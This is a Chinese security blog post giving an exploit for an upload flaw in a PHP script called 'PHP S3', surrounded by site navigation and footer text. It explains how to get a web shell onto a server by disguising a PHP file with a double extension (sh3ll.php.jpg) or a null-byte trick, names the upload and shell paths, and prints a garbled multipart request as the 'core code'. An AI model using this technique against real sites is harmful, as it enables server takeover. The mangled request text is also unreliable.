我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息PHP.S3.TO 上传漏洞利用
PHP.S3.TO 上传漏洞利用
2847
0推荐
0评论

PHP S3上传漏洞

这个网页漏洞比较严重,可以直接获取shell,下面给出漏洞利用方法


漏洞信息:

可以任意上传PHP,TXT,JPG,PNG格式文件

change your shell to sh3ll.php.jpg or
sh3ll.php%0%0.1.jpg



漏洞利用演示:

利用:

hackqing.com/[dir]/up/upload.php
加载的文件 :
hackqing.com/[dir]/up/img/Sh3ll.php.jpg

漏洞核心代码:

114782935826962 Content-Disposition: form-data;

name="MAX_FILE_SIZE" 1048576 -1147829358
26962 Content-Disposition: form-data;name="upfile";
filename="sh3ll.php.jpg" Content-Type: text/plain
-----------------------------114782935826962 Content-Disposition:
form-data; name="pass" --114782935826962 Content-Disposition:form-data;
name="com" -----------------------------114782935826962--

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415